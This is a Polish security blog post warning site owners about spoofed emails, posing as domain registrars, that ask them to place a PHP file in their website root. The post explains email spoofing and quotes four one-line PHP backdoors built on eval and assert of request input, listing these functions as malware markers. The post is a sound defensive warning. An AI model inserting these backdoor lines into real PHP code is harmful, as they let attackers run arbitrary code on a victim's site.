Security Blog
Security Blog
Posted By Gregory

Nie ufaj tym fałszywym e-mailom potwierdzającym domenę

Jeśli kiedykolwiek otrzymasz list z prośbą o utworzenie, pobranie lub zainstalowanie kodu PHP na swojej stronie internetowej, musisz go zignorować


English version: Do not trust those fake domain confirmation emails


Ostatnio niektórzy moi klienci otrzymali dziwne listy e-mail od swoich rejestratorów domen. Listy te zawierają prośbę o potwierdzenie ich własnych domen. Sprawdziłem jeden z tych listów i szybko zidentyfikowałem go jako list oszukańczy . Wszystkie listy mają identyczny wzór i prośbę o utworzenie pliku PHP w folderze głównym na stronie internetowej o określonej nazwie i podanej zawartości. Nie trzeba dodawać, że sugerowana zawartość dla tego pliku PHP zawiera złośliwy kod znany jako kod backdoor. Ten rodzaj kodu pozwala atakującemu wykonać dowolną czynność na stronie internetowej ofiary.

Jeśli kiedykolwiek otrzymasz list jakiegokolwiek rodzaju, który prosi o stworzenie, pobranie lub zainstalowanie kodu PHP na Twojej stronie internetowej, musisz go zignorować. Bez wyjątku. Nawet jeśli list pochodzi od prezydenta lub Twojej mamy.

Oszukańcze listy wydają się autentyczne z powodu autentycznego adresu e-mail From . Ale to jest podszywanie się pod e-mail. Nie spodziewasz się otrzymać fałszywego e-maila od znajomych lub rejestratora domeny. Prawda? Nie! Każdy e-mail może zawierać dowolny adres e-mail From. Zdecydowana większość serwerów i klientów e-mail nie sprawdza ani nie weryfikuje adresu nadawcy. Więc widzisz to jako poszukiwanego hakera. Nie możesz ufać żadnemu e-mailowi, który otrzymałeś od znanego nadawcy, jeśli zawiera on prośbę o podejrzane działanie, takie jak zainstalowanie kodu na Twojej stronie internetowej lub aplikacji na Twoim komputerze.

Szczegóły techniczne

Fałszywe e-maile zazwyczaj zawierają niektóre z poniższych wierszy kodu PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

FYI: base64_decode, eval i assert to dobrze znane markery podejrzanego lub złośliwego kodu PHP.

Zobacz także: Plugin Inspector ujawnia problemy z bezpieczeństwem innych wtyczek


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.